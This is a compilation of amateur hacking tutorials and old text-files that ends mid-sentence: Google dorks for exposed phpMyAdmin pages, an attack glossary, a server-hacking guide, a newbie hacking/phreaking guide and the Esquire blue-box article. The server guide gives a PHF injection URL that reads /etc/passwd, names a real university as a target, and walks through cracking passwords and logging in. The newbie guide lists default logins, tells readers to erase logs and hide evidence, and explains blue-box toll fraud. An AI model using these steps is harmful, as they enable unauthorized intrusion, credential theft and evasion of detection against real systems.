Google Hack


They call them ‘googledorks’ ( gOO gôl’Dôrk, noun, slang ) : An inept or foolish person as revealed by Google.

Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.

Example Dorks:-

1. CGI directories contain scripts which can often be exploited by attackers. Click here for the Google search ==> “index of cgi-bin”.
This way you will find many CGI directories some of them may be vulnerable.

2. Another famous Google Dork is the PhpMyAdmin Dork. phpMyAdmin is a widly spread webfrontend used to mantain sql databases.

The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well gues what, obviously some admins are either too lazy or don’t know how to secure their directories.

Click here for the Google search ==> “Welcome to phpMyAdmin” ” Create new database”
This way you may find some vulnerable pages to gain access to someone’s PhpMyAdmin.

Honeypot

Honeypots or Honeypages are webpages designed to attract Google Dorkyz or Google Hackers. If you search for “index of /etc/passwd” on google.

The first link you find is a very famous gray-world.net honeypot. The biggest database of Google Dorks is here.

Computer Attacks You’ve Never Heard


Malware is serious business. It can slow PCs down to a crawl. On the other hand, some of the terms security researchers have decided to name these sometimes annoying (and often damaging) pieces of code are downright charming.
Here are nine that stand out, followed by seven most people have heard of:
The Security Attacks Most People Have Never Heard Of

Smishing: Smishing or “SMS phishing” refers to a phishing attack that specifically targets mobile phones. The victim would receive an SMS with a hyperlink wherein a malware automatically finds its way in your phone or leads the user to a phishing site formatted for mobile screens. The term was brought on by David Rayhawk in a McAfee Avert Labs blog.
Botnet (Zombie PCs): A portmanteau of the words “Robot” and “Network,” a Botnet is any number of internet computers that inconspicuous to their owners; forward e-mails (any of which include spam, malware, or viruses) to other computers on the internet. These infected computers are also known as “zombies”. DoS attacks (Denial of Service) often rely on thousands of zombie PCs.
BlueBugging: A craze originally jumpstarted by a Malaysian IT Professional, bluebugging (not to be confused with bluesnarfing) allows a more skilled person to illegally access a cellular phone via Bluetooth wireless technology. This act often times goes unnoticed without any proper notification or alerting to the phone’s user. A vulnerability such as this allows phone calls, SMS messages to be read and sent, phonebook contacts to be erased, phone conversations to be tapped, and other malicious activities. But much to the hacker’s dismay [I think the hacker knows the limitations… perhaps the point is that widespread impact is minimized because of the range…], access is only attainable within a 10 meter range of the phone.
Pod Slurping: Coined by US security expert Abe Usher; Pod Slurping is when your iPod or any portable USB storage device begins to surreptitiously copy large amounts of files from your computer to its hard drive, it’s engaged in something called “Pod Slurping”. Pod slurping is becoming an increasing security risk to companies and government agencies. Typically, access is gained while the computer is unattended, and this process can occur in as little as 65 seconds.
Ransomware: A program that makes a computer near unusable then demands payment in order for the user to regain full access. It “kidnaps” the computer! Ransomware is also commonly referred to as a “cryptovirus” or “cryptotrojan.” Examples of Ransomware include Gpcode.AK, Krotten, and Archiveus. Ransomware was originally a with a trojan called PC Cyborg, created by a Dr. Joseph Popp.
Scareware: Scareware is software that tricks people into downloading or purchasing it, under the guise of fixing their computer, when in reality the faux anti-virus program is the real problem. Scareware programs often run a fictitious or careless system scan, and then present the user with a list of malicious programs that must be corrected, always leaving itself off of the list. The scareware then informs that in order to fix these “problems” it will require the user to pay a fee for a “full” or “registered” version of the software. Examples of scareware include: System Security, Anti-Virus 2010, and Registry Cleaner XP.
Sidejacking: Sidejacking is a hacking technique used to gain access to your website specific accounts. Websites typically encrypt your password so it cannot be stolen, but then send you an unencrypted “session-id”. The session-id is either some random data in the URL, or more often, random data in a HTTP cookie. A hacker who finds the session-id can then use it to gain access to the respective account. Thus enabling the hacker ability to read your email, look at what you’ve bought online, or control your social network account, and so on. Robert Graham, who pulled together a variety of known and new vulnerabilities and packaged them into an automated session snatcher, was responsible for this term.
Black Hat: “Black Hat” hackers are those people who specialize in unauthorized breaching of information systems, often times attacking those containing sensitive information. They may use computers to attack systems for profit, for fun, or for political motivations. Attacks often involve modification and/or destruction of data which is done without authorization. They also may distribute computer viruses, internet Worms and deliver spam through the use of botnets.
White Hat: A “White Hat” hacker describes an individual who identifies a security weakness in a computer system or network but, instead of maliciously taking advantage of it, exposes the weakness, and repairs the vulnerability protecting the network from unwarranted intrusions or attacks. The term is taken from old western films, where the white hat cowboy is portrayed as the hero, and the black hat as the villain.
The Attacks Everyone Sort of Understands

Worm: Originating in a Xerox Palo Alto Research Center 1979 by engineers, a “Computer Worm” was originally designed to make programs run more efficiently, then later corrupted to be a destructive computer virus that can alter or erase data on computers. Often times, they leave files irretrievably corrupted or slow the PC down to a crawl.
Trojan Horse: A long time and common infection found amongst even the newest of computers, this destructive program disguises itself as a harmless application. Although Trojans are incapable of self-replication, they are still just as destructive as a computer virus. In an act similar to its Greek origin, often times a Trojan horse opens up a backdoor to your computer enabling potential viral infections and allowing hackers to control the PC. Origins trace back to MIT hacker turned NSA spook, Dan Edwards.
Phishing: Originated by hackers who were stealing America On Line accounts by scamming passwords from unsuspecting users, “phishing” is the age-old crime of taking ownership of sensitive information from third parties (phishing scam victims). Information includes usernames, passwords, banking information, and credit card numbers. This is typically accomplished from sending someone an e-mail fraudulently claiming to be a legitimate company, or redirecting someone to a website that looks legitimate but isn’t. More often than not, the direct result of being phished is your identity being stolen.
Script Kiddies: A term originated by Marcus Ranum to describe white hats who had no idea what they were doing, a script kiddy (sometimes plural as kiddies) is a derogative term, used by more skilled hackers of computer security systems, to describe young or less experienced hackers who still can be just as much a threat or annoyance. Utilizing cheap techniques, pre-written scripts and sometimes with assistance, the average script kiddy can exploit a weakness with computer networks. The difference is that these untrained hackers are often unaware of the potential consequences of their actions.
Keylogging: Originally designed by Perry Kivolowitz for a Usenet news group in 1983, Keylogging for the most part has become increasingly common, not to mention dangerous. It involves the recording of any keyboard input via internet connection. Not every instance of keylogging is necessarily illegal. It’s sometimes done as a way to monitor teens and children.
Social Engineering: Brought into common knowledge by Kevin Mitnick (a hacker popular back in the day), Social Engineering involves obtaining or attempting to obtain private data by illegally persuading an individual to reveal otherwise secure information. The Information released by victims is often then used to attack a computer network. One common example would be when an employee at a large company is convinced to give out his employee identification, and then it is manipulated to gain further access to the said company’s network, often sensitive information.
Crapware: Originally coined and reported by Marc Orchant on his ZDNet blog, Crapware is comprised of programs that use valuable resources on a computer’s hard drive, such as memory or RAM, which are not necessary and are unused by the computer owner. Crapware can range from software loaded onto the system prior to sale to programs that are downloaded from the internet without the knowledge or consent of the user. One of the more common examples of Crapware is AOL being installed on PCs by the PC manufacturer.
Av a try!! 😀

> Hacking Servers?? <


I am asked at least 5 or more times a past day, beginning “hackers”, “How can I hack?” or “Is there a way to hack a web site?” Well there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow and hacking web servers and ftp servers is one of the easiest ways. If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who dont know.

Part 1: Simple UNIX Commands

Most DOS commands have UNIX and Linux equivalents. Listed below are some of the main commands you will need to know to use a shell account.

HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD

To see who else is on the system you can type WHO. To get information about a specific user on the system type FINGER <username>. Using those basic UNIX commands you can learn all you need to know about the system you are using.Hacking The IT Cube: The Information Technology Survival Guide — Douglas Chick.

Part 2: Cracking Passwords

On UNIX systems the file that contains the passwords for all the users on the system is located in the /etc directory. The filename is passwd. I bet your thinking….”Great. All I have to do is get the file called /etc/passwd and I’ll be a hacker.” If that is what you are thinking then you are dead wrong. All the accounts in the passwd file have encrypted passwords. These passwords are one-way encrypted which means that there is no way to decrypt them. However, there are programs that can be used to obtain passwords from the file. The name of the program that I have found to be the best password cracker is called “Cracker Jack.” This program uses a dictionary file composed of thousands of words. It compares the encrypted forms of the words in the list to the encrypted passwords in the passwd file and it notifies you when it finds a match. Cracker Jack can be found at my web site which is at http://www.geocities.com/SiliconValley/9185 Some wordlists can be found at the following ftp site: sable.ox.ac.uk/ pub/wordlists. To get to the wordlist that I usually use goto that ftp site then goto the American directory. Once you are there download the file called dic-0294.tar.Z

Part 3: The Hard Part (Finding Password Files)

Up till now I have been telling you the easy parts of hacking a server. Now we get to the more difficult part. It’s common sense. If the system administrator has a file that has passwords for everyone on his or her system they are not going to just give it to you. You have to have a way to retrieve the /etc/passwd file without logging into the system. There are 2 simple ways that this can sometimes be accomplished. Often the /etc directory is not blocked from FTP. To get the passwd file this way try using an FTP client to access the site anonymously then check the /etc directory to see if access to the passwd file is restricted. If it is not restricted then download the file and run Cracker Jack on it. If it is restricted then try plan B. On some systems there is a file called PHF in the /cgi-bin directory. If there is then you are in luck. PHF allows users to gain remote access to files (including the /etc/passwd file) over the world wide web. To try this method goto your web browser and type in this URL: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
Then substitute the site you are trying to hack for the xxx.xxx.xxx.
For example, if I wanted to hack St. Louis University (and I have already) I
would type in http://www.slu.edu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

Don’t bother trying http://www.slu.edu because I have already done it and told them about their security flaw.
Here’s a hint: try http://www.spawn.com and http://www.garply.com If the preceding to methods fail then try any way you can think of to get that file. If you do get the file and all the items in the second field are X or ! or * then the password file is shadowed. Shadowing is just a method of adding extra security to prevent hackers and other unwanted people from using the password file. Unfortunately there is no way to “unshadow” a password file but sometimes there are backup password files that aren’t shadowed. Try looking for files such as /etc/shadow and other stuff like that.

Part 4: Logging In To “Your” New Shell

OK….This is where you use what you found using Cracker Jack. Usernames and passwords. Run your telnet client and telent to the server that you cracked the passwords for, such as http://www.slu.edu. When you are connected it will give a login screen that asks for a login names and password and usually information on the operating system that the server is using (usually UNIX,
linux, aix, irix, ultrix, bsd, or sometimes even DOS or Vax / Vms). Just type in the information you got after cracking the passwd file and whatever you know about UNIX to do whatever you feel like doing. But remember that hacking isn’t spreading viruses or causing damage to other computer systems. It is using your knowledge to increase your knowledge.

Part 5: Newbie Info

If you feel that you have what it takes to be a serious hacker then you must first know a clear definition of hacking and how to be an ethical hacker. Become familiar with unix environments and if you are only just starting to learn to hack, visit a local library and find some books on various operating systems on the internet and how they work. Or you could go to a book store and buy a couple internet security books. They often explain how hackers penetrate systems and that is something a beginner could use as an advantage.

900D LU(|<!!

7 clever Google tricks


Below I have compiled a list of 7 clever Google tricks that I believe everyone should be aware of.  Together I think they represent the apex of the grand possibilities associated with Google search manipulation tricks and hacks.  Although there are many others out there, these 7 tricks are my all-time favorite.  Enjoy yourself.

1.  Find the Face Behind the Result – This is a neat trick you can use on a Google Image search to filter the search results so that they include only images of people.  How is this useful?  Well, it could come in handy if you are looking for images of the prominent people behind popular products, companies, or geographic locations.  You can perform this search by appending the code&imgtype=face to the end of the URL address after you perform a standard Google Image search.

2.  Google + Social Media Sites = Quality Free Stuff – If you are on the hunt for free desktop wallpaper, stock images, WordPress templates or the like, using Google to search your favorite social media sites is your best bet.  The word “free” in any standard search query immediately attracts spam.  Why wade through potential spam in standard search results when numerous social media sites have an active community of users who have already ranked and reviewed the specific free items that interest you.  All you have to do is direct Google to search through each of these individual social media sites, and bingo… you find quality content ranked by hundreds of other people.

3.  Find Free Anonymous Web Proxies – A free anonymous web proxy site allows any web browser to access other third-party websites by channeling the browser’s connection through the proxy.  The web proxy basically acts as a middleman between your web browser and the third-party website you are visiting.  Why would you want to do this?  There are two common reasons:

  • You’re connecting to a public network at a coffee shop or internet café and you want privacy while you browse the web.  You don’t want the admin to know every site you visit.
  • You want to bypass a web content filter or perhaps a server-side ban on your IP address.  Content filtering is common practice on college campus networks.  This trick will usually bypass those restrictions.

There are subscription services and applications available such as TOR and paid VPN servers that do the same thing.  However, this trick is free and easy to access from anywhere via Google.  All you have to do is look through the search results returned by the queries below, find a proxy that works, and enter in the URL of the site you want to browse anonymously.

4.  Google for Music, Videos, and Ebooks – Google can be used to conduct a search for almost any file type, including Mp3s, PDFs, and videos.  Open web directories are one of the easiest places to quickly find an endless quantity of freely downloadable files.  This is an oldie, but it’s a goodie!  Why thousands of webmasters incessantly fail to secure their web severs will continue to boggle our minds.

5.  Browse Open Webcams Worldwide – Take a randomized streaming video tour of the world by searching Google for live open access video webcams.  This may not be the most productive Google trick ever, but it sure is fun!  (Note: you may be prompted to install an ActiveX control or the Java runtime environment which allows your browser to view certain video stream formats.)

6.  Judge a Site by its Image – Find out what a site is all about by looking at a random selection of the images hosted on its web pages.  Even if you are somewhat familiar with the target site’s content, this can be an entertaining little exercise.  You will almost surely find something you didn’t expect to see.  All you have to do is use Google’s site: operator to target a domain in an image search.

7.  Results Based on Third-Party Opinion – Sometimes you can get a better idea of the content located within a website by reading how other websites refer to that site’s content.  The allinanchor: Google search operator can save you large quantities of time when a normal textual based search query fails to fetch the information you desire.  It conducts a search based on keywords used strictly in the anchor text, or linking text, of third party sites that link to the web pages returned by the search query.  In other words, this operator filters your search results in a way such that Google ignores the title and content of the returned web pages, but instead bases the search relevance on the keywords that other sites use to reference the results.  It can add a whole new dimension of variety to your search results.

Bonus Material:

Here is a list of my favorite Google advanced search operators, operator combinations, and related uses:

  • link:URL = lists other pages that link to the URL.
  • related:URL = lists other pages that are related to the URL.
  • site:domain.com “search term = restricts search results to the given domain.
  • allinurl:WORDS = shows only pages with all search terms in the url.
  • inurl:WORD = like allinurl: but filters the URL based on the first term only.
  • allintitle:WORD = shows only results with terms in title.
  • intitle:WORD = similar to allintitle, but only for the next word.
  • cache:URL = will show the Google cached version of the URL.
  • info:URL = will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
  • filetype:SOMEFILETYPE = will restrict searches to that filetype
  • -filetype:SOMEFILETYPE = will remove that file type from the search.
  • site:www.somesite.net “+www.somesite.net” = shows you how many pages of your site are indexed by google
  • allintext: = searches only within text of pages, but not in the links or page title
  • allinlinks: = searches only within links, not text or title
  • WordA OR WordB = search for either the word A or B
  • “Word” OR “Phrase” = search exact word or phrase
  • WordA -WordB = find word A but filter results that include word B
  • WordA +WordB = results much contain both Word A and Word B
  • ~WORD = looks up the word and its synonyms
  • ~WORD -WORD = looks up only the synonyms to the word.

How To Begin In The World Of HaCking/Phreaking


I am not responsible for any of the information in this document, if it is used for any other purpose than educational reading. Some of the information on this page can be used illegally if the reader does not act responsible.When I got into hacking, i realized that there wasnt many text philes for  newbies. so, i decided to write one. i dont really care about misspelled werds or puncuation so, please ignore the mistakes. In this document i willrefer you to other documents a lot. (because why should i waste my time rewriting something that has already been writen?) If at anytime while reading this document you ask yourself “So…How do I hack?”, then go away now and save yourself the frustration because you’ll never learn. To   hack you must understand everything about a system, and then you can get  ideas and try them out.  I tried to keep this phile as short as possible, when you read this you should just get an idea about how to hack and why we hack. If you read thisdocument and the philes that i have listed, you should have a good ideaon what to do, how to do it, and why. Remember every ‘project’ is different.You have to use your brain and adjust to each different one. Tools: There are a few things you need to have to be a hacker/phreaker. ‘puter – computer (duh)terminal software – a program like, hyper terminal or ordinary terminal that allows you to dial out to another system.blue box  – (exerpted from 2600faq)Blue boxes use a 2600hz tone to size control of telephone switches that use in-band signalling. The caller may then access special switch functions, with the usual purpose of making free long distance phone calls, using the tones provided by the Blue Box.
scanner – a scanner is a program that dials out every number in your area and listens for tones that are comming from other modems. (helps you locateyour local targets) a good scanner is Toneloc. Find it!Fone (phone) line – I hope you know whut this is…It also helps to know a computer language ex: C, C++ ect.
Info resources:I dont know many good boards anymore because almost all of their sysops (system operators) have been busted.  But I suggest you get a server that uses netscape and get unlimited access to the www(World wide web). And visit these good homepages by entering their name in the webcrawler search engine (http://webcrawler.com) Silicon Toads Hacking ResourcesFlamestrike EnterprisesThe Plowsk¥ Page (mine, you can reach me from there)Matervas HideoutBurns LairCold fire  From these pages you will find a wealth of information on h/p                                                         (hacking/phreaking)
getting started:  the first thing you must do is get on your computer, open your terminal software and connect to a board. (bulletin board, bbs).  This is a must!(its also a VERY basic thing). (You can usually find a bbs number on a homepage or enter bbs in a search engine.) Now that you can do that, start reading. Read as many text philes as possible. Required reading: Hackers Manifesto (at bottom)Hackers Code of ethicsAny old issues of Phrackany old issues of 26002600faqany text documents on systems (unix, iris, dec)DOD (department of defense) standardsAny philes on boxes (blue(one at bottom), red, beige) For beginners, which most of you probably are, I suggest you find some of the following systems that exist in your area and work on them first. (they are the easiest and least risky)This next segment is excerpted from:A Novice’s Guide to Hacking- 1989 edition                 by                        The Mentor                                  Legion of Doom/Legion of Hackers
IRIS-      IRIS stands for Interactive Real Time Information System.  It orig-inally ran on PDP-11’s, but now runs on many other minis.  You can           spot an IRIS by the ‘Welcome to “IRIS” R9.1.4 Timesharing’ banner,           and the ACCOUNT ID? prompt.  IRIS allows unlimited tries at hacking           in, and keeps no logs of bad attempts.  I don’t know any default           passwords, so just try the common ones from the password database           below.           Common Accounts:           MANAGER           BOSS           SOFTWARE           DEMO           PDP8           PDP11           ACCOUNTINGDEC-10-    An earlier line of DEC computer equipment, running the TOPS-10           operating system.  These machines are recognized by their           ‘.’ prompt.  The DEC-10/20 series are remarkably hacker-friendly,           allowing you to enter several important commands without ever           logging into the system.  Accounts are in the format [xxx,yyy] where           xxx and yyy are integers.  You can get a listing of the accounts and           the process names of everyone on the system before logging in with           the command .systat (for SYstem STATus).  If you seen an account           that reads [234,1001]   BOB JONES, it might be wise to try BOB or           JONES or both for a password on this account.  To login, you type           .login xxx,yyy  and then type the password when prompted for it.           The system will allow you unlimited tries at an account, and does           not keep records of bad login attempts.  It will also inform you           if the UIC you’re trying (UIC = User Identification Code, 1,2 for           example) is bad.           Common Accounts/Defaults:           1,2:        SYSLIB or OPERATOR or MANAGER           2,7:        MAINTAIN           5,30:       GAMES
UNIX-      There are dozens of different machines out there that run UNIX.           While some might argue it isn’t the best operating system in the           world, it is certainly the most widely used.  A UNIX system will           usually have a prompt like ‘login:’ in lower case.  UNIX also           will give you unlimited shots at logging in (in most cases), and           there is usually no log kept of bad attempts.           Common Accounts/Defaults: (note that some systems are case           sensitive, so use lower case as a general rule.  Also, many times           the accounts will be unpassworded, you’ll just drop right in!)           root:       root           admin:      admin           sysadmin:   sysadmin or admin           unix:       unix           uucp:       uucp           rje:        rje           guest:      guest           demo:       demo           daemon:     daemon           sysbin:     sysbinCode of ethics: Once you get in a system, do not manipulate anything but the log file (erase the record of your bad logins) and anywhere you might have left your handle. (name, a.k.a.) You dont want to leave your handle anywhere because they WILL be able to track you down by your handle alone.Its ok to be paranoid!Dont think for one minute that you are undetectable, if you make any mistakes, you could get caught. Here is a list of things you could do to help yourself from getting in trouble. * Encrypt your entire hard drive* hide your files in a very safe spot.* dont tell anyone that you dont know very well about your hacking. Good   hackers never reveal specific details to anyone about their current project.  They give only very vague hints of what they are doing. * dont openly give out your real name or address* dont join any major hacking groups, be an individual.* Dont hack government computers, ESPECIALLY YOUR OWN GOVERNMENTS! Foreign   computers can sometimes be phun, but dont say i didnt warn you!* Make sure that you dont leave any evidence that you have been in a system   and any evidence of who it was.* Use your brain.If you follow most of these guidelines, you should be safe. The last thing you want is to end up in a one room apartment located in the third floor ofthe state prision with your cellmate Bruno, the ax murderer,  whose doing life.Getting in:The hardest thing about hacking is getting the numbers for a system. You can do this by using a scanning program. Then, once you connect to a systemyou must first recognise what kind of system you have connected to. (by theway, for you real brainiacs, you have to use your terminal software to callanother system.) You can usually do this by looking at the prompt you get,if you get one. (check the Unresponsive section) Sometimes a system will tell you as soon as you connect by saying some thing like “hello, welcome to Anycompany using anysystem v 1.0″ When you determine what system you haveconnected to, this is when you start trying your logins. You can try typingin demo and as your userid and see if you can find any users names to try.If you enter a name and you are allowed in without a password you usually, but not always, have entered a name that you cant do a whole lot with but, it can still be phun and you can probably find clues on how to get in on another name.While your in:There are usually many interesting files you can read in all of these systems. You can read files about the system. You might want to try a help command. They will usually tell you a lot. Sometimes, if your lucky, you canmanage to download the manual of the system!There is nothing like the thrill of your first hack, even if it wasnt a verygood one, it was probably still phun. You could read every text phile in theworld and you still probably wouldnt learn as much as you do during your first hack. Have Phun!This next segment is also excerpted from:A Novice’s Guide to Hacking- 1989 edition                 by                        The Mentor                                  Legion of Doom/Legion of Hackers
Unresponsive Systems~~~~~~~~~~~~~~~~~~~~   Occasionally you will connect to a system that will do nothing but sitthere.  This is a frustrating feeling, but a methodical approach to the systemwill yield a response if you take your time.  The following list will usuallymake *something* happen.1)  Change your parity, data length, and stop bits.  A system that won’t re-    spond at 8N1 may react at 7E1 or 8E2 or 7S2.  If you don’t have a term    program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,    with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.     While having a good term program isn’t absolutely necessary, it sure is    helpful.2)  Change baud rates.  Again, if your term program will let you choose odd    baud rates such as 600 or 1100, you will occasionally be able to penetrate    some very interesting systems, as most systems that depend on a strange    baud rate seem to think that this is all the security they need…3)  Send a series of <cr>’s.4)  Send a hard break followed by a <cr>.5)  Type a series of .’s (periods).  The Canadian network Datapac responds    to this.6)  If you’re getting garbage, hit an ‘i’.  Tymnet responds to this, as does    a MultiLink II.7)  Begin sending control characters, starting with ^A –> ^Z.8)  Change terminal emulations.  What your vt100 emulation thinks is garbage    may all of a sudden become crystal clear using ADM-5 emulation.  This also    relates to how good your term program is.9)  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,    JOIN, HELP, and anything else you can think of.10) If it’s a dialin, call the numbers around it and see if a company    answers.  If they do, try some social engineering.I tried to keep this phile as short as possible to save downloading time and just telling you the very basics like what you need to do and what you need to read. I hope this was helpful.
Plowsk¥ PhreakHere are two philes i copied for your reading pleasure:bluebox.txtandThe Hackers Manifestobluebox.txt -The Secrets of the Little Blue Box Originally found in Esquire MagazineTHE BLUE BOX IS INTRODUCED: IT’S QUALITIES ARE REMARKEDI am in the expensively furnished living room of Al Gilbertson, the creatorof the blue box. Gilbertson is holding one of his shiny black-and-silverblue boxes comfortably in the palm of his hand, pointing out the thirteenlittle red push buttons sticking up from the console. He is dancing hisfingers over the buttons, tapping out discordant beeping electronic jingles.He is trying to explain to me how his little blue box does nothing less thanplace the entire telephone system of the world, satellites, cables and all,at the service of the blue-box operator, free of charge.”That’s what it does. Essentially it gives you the power of a superoperator. You sieze a tandem with this top button,” he presses the topbutton with his index finger and the blue box emits a high-pitched cheep,”and like that,” the box cheeps again “you control the phone company’s longdistance switching systems from your cute little Princess phone or any oldpay phone. And you’ve got anonymity. An operator has to operate from adefinite location. The phone company knows where she is and what she’sdoing. But with your blue box, once you hop onto a trunk, say from a HolidayInn 800 number, they don’t know where you are, or where you’re coming from,they don’t know how you slipped into their lines and popped up in that 800number. They don’t even know anything illegal is going on. And you canobscure your origins through as many levels as you like. You can call nextdoor by way of White Plains, then over to Liverpool by cable and then backhere by satellite. You can call yourself from one pay phone all the wayaround the world to a pay phone next to you. And you get your dime back too.”And they can’t trace the calls? They can’t charge you?””Not if you do it the right way. But you’ll find that the free-call thingisn’t really as exciting at first as the feeling of power you get fromhaving one of these babies in your hand. I’ve watched people when they firstget hold of one of these things and start using it, and discover they canmake connections, set up crisscross and zigzag switching patterns back andforth across the world. They hardly talk to the people they finally reach.They say hello and start thinking of what kind of call to make next. They goa little crazy.” He looks down at the neat little package in his palm. Hisfingers are still dancing, tapping out beeper patterns.”I think it’s something to do with how small my models are. There are lotsof blue boxes around, but mine are the smallest and most sophisticatedelectronically. I wish I could show you the prototype we made for our bigsyndicate order.”He sighs. “We had this order for a thousand blue boxes from a syndicatefront man in Las Vegas. They use them to place bets coast to coast, keeplines open for hours, all of which can get expensive if you have to pay. Thedeal was a thousand blue boxes for $300 apiece. Before then we retailed themfor $1500 apiece, but $300,000 in one lump was hard to turn down. We had amanufacturing deal worked out in the Philippines. Everything was ready togo. Anyway, the model I had ready for limited mass production was smallenough to fit inside a flip-top Marlboro box. It had flush-touch panels fora keyboard, rather than these unsightly buttons sticking out. Looked justlike a tiny portable radio. In fact I had designed it with a tiny transistorreceiver to get one AM channel, so in case the law became suspicious theowner could switch on the radio part, start snapping his fingers and no onecould tell anything illegal was going on. I thought of everything for thismodel–I had it lined with a band of thermite which could be ignited byradio signal from a tiny button transmitter on your belt, so it could beburned to ashes instantly in case of a bust. It was beautiful. A beautifullittle machine. You should have seen the face on these syndicate guys whenthey came back after trying it out. They’d hold it in their palm like theynever wanted to let it go, and they’d say, ‘I can’t believe it.’ Youprobably won’t believe it until you try it.”THE BLUE BOX IS TESTED: CERTAIN CONNECTIONS ARE MADEAbout eleven o’clock two nights later Fraser Lucey has a blue box in thepalm of his left hand and a phone in the palm of his right. His is standinginside a phone booth next to an isolated shut-down motel. I am standingoutside the phone booth.Fraser likes to show off his blue box for people. Until a few weeks ago whenPacific Telephone made a few arrests in his city, Fraser Lucey liked tobring his blue box to parties. It never failed: a few cheeps from his deviceand Fraser became the center of attention at the very hippest of gatherings,playing phone tricks and doing request numbers for hours. He began to takeorders for his manufacturer in Mexico. He became a dealer.Fraser is cautious now about where he shows off his blue box. But he nevergets tired of playing with it. “It’s like the first time every time,” hetells me.Fraser puts a dime in the slot. He listens for a tone and holds the receiverup to my ear. I hear the tone.Fraser begins describing, with a certain practiced air, what he does whilehe does it.”I’m dialing an 800 number now. Any 800 number will do. It’s toll free.Tonight I think I’ll use the Ryder Rent A Van number. Listen it’s ringing.Here, you hear it? Now watch.”He places the blue box over the mouthpiece of the phone so that the onesilver and twelve black push buttons are facing up toward me. He presses thesilver button – the one at the top – and I hear that high-pitched beep.”That’s 2600 cycles per second to be exact,” says Lucey. “Now, quick,listen.”He shoves the ear piece at me. The ringing has vanished. The line gives aslight hiccough, there is a sharp buzz, and then nothing but soft whitenoise.”We’re home free now,” Lucey tells me, taking back the phone and applyingthe blue box to its mouthpiece once again. “We’re up on a tandem, into along-lines trunk. Once you’re up on a tandem, you can send yourself anywhereyou want to go.” He decides to check you London first. He chooses a certainpay phone located in Waterloo station. This particular pay phone is popularwith the phone-phreaks because there are usually people walking by at allhours who will pick it up and talk for a while.He presses the lower left-hand corner button which is marked “KP” on theface of the box.”That’s Key Pulse. It tells the tandem we’re ready to give it instructions.First I’ll punch out KP 182 START, which will slide us into the overseassender in White Plains.” I hear neat clunk-cheep. “I think we’ll head overto England by satellite. Cable is actually faster and the connection issomewhat better, but I like going by satellite. So I just punch out KP Zero44. The Zero issupposed to guarantee a satellite connection and 44 is thecountry code for England. Okay…we’re there. In Liverpool actually. Now allI have to do is punch out the London area code which is 1, and dial up thepay phone. Here, listen, I’ve got a ring now.”I hear the soft quick purr-purr of a London ring. Then someone picks up thephone. “Hello,” says the London voice.”Hello, Who’s this?” Fraser asks.”Hello. There’s actually nobody here. I just picked this up while I waspassing by. This is a public phone. There’s no one here to answer actually.””Hello. Don’t hang up. I’m calling from the United States.””Oh. What is the purpose of the call? This is a public phone you know.””Oh. You know. To check out, uh, to find out what’s going on in London. Howis it there?””It’s five o’clock in the morning. It’s raining now.””Oh. Who are you?”The London passerby turns out to be an R.A.F. enlistee on his way back tothe base in Lincolnshire, with a terrible hangover after a thirty-six hourpass.He and Fraser talk about the rain. They agree that it’s nicer when it’s notraining. They say good-bye and Fraser hangs up. His dime returns with a niceclink.”Isn’t that far out,” he says grinning at me. “London. Like that.”Fraser squeezes the little blue box affectionately in his palm. “I told yathis thing is for real. Listen, if you don’t mind I’m gonna try this girl Iknow in Paris. I usually give her a call around this time. It freaks herout. This time I’ll use the Penske 800 number and we’ll go by overseas cable133; 33 is the country code for France, the 1 sends you by cable. Okay, herewe go. Oh damn. Busy. Who could she be talking to at this time?”A state police car cruises slowly by the motel. The car does not stop, butFraser gets nervous. We hop back into his car and drive ten miles in theopposite direction until we reach a Texaco station locked up for the night.We pull up to a phone booth by the tire pump. Fraser dashes inside and triesthe Paris number. It is busy again.”I don’t understand who she could be talking to. The circuits may be busy.It’s too bad I haven’t learned how to tap into lines overseas with thisthing yet.”Fraser begins to phreak around, as the phone phreaks say. He dials a leadingnationwide charge card’s 800 number and punches out the tones that bring himthe Time recording in Sydney, Australia. He beeps up the Weather recordingin Rome, in Italian of course. He calls a friend in Chicago and talks abouta certain over the counter stock they are into heavily. He finds the Parisnumber busy again. He calls up a dealer of another sort and talks in code.He calls up Joe Engressia, the original blind phone phreak genius, and payshis respects. There are other calls. Finally Fraser gets through to hisyoung lady in Paris. They both agree the circuits must have been busy, andcriticize the Paris telephone system. At two-thirty in the morning Fraserhangs up, pockets his dime, and drives off, steering with one hand, holdingwhat he calls his “lovely little blue box” in the other.YOU CAN CALL LONG DISTANCE FOR LESS THAN YOU THINK”You see, a few years ago the phone company made one big mistake,”Gilbertson explains two days later in his apartment. “They were carelessenough to let some technical journal publish the actual frequencies used tocreate all their multi-frequency tones. Just a theoretical article some BellTelephone Laboratories engineer was doing about switching theory, and helisted the tones in passing. At MIT I had been fooling around with phonesfor several years before I came across a copy of the journal in theengineering library. I ran back to the lab and it took maybe twelve hoursfrom the time I saw that article to put together the first working blue box.It was bigger and clumsier than this little baby, but it worked.”It’s all there on public record in that technical journal written mainly byBell Lab people for other telephone engineers. Or at least it was public.”Just try and get a copy of that issue at some engineering school librarynow. Bell has had them all red-tagged and withdrawn from circulation,”Gilbertson tells me.”But it’s too late now. It’s all public now. And once they became public thetechnology needed to create your own beeper device is within the range ofany twelve-year-old kid, any twelve-year-old blind kid as a matter of fact.And he can do it in less than the twelve hours it took us. Blind kids do itall the time. They can’t build anything as precise and compact as my beeperbox, but theirs can do anything mine can do.””How?””Okay. About twenty years ago AT&T made a multi-million dollar decision tooperate its entire long-distance switching system on twelve electronicallygenerated combinations of six master tones. Those are the tones yousometimes hear in the background after you’ve dialed a long distance number.They decided to use some very simple tones. The tone for each number is justtwo fixed single-frequency tones played simultaneously to create a certainbeat frequency. Like 1300 cycles per second and 900 cycles per second playedtogether give you the tone for digit 5. Now, what some of these phonephreaks have done is get themselves access to an electric organ. Any cheapfamily home entertainment organ. Since the 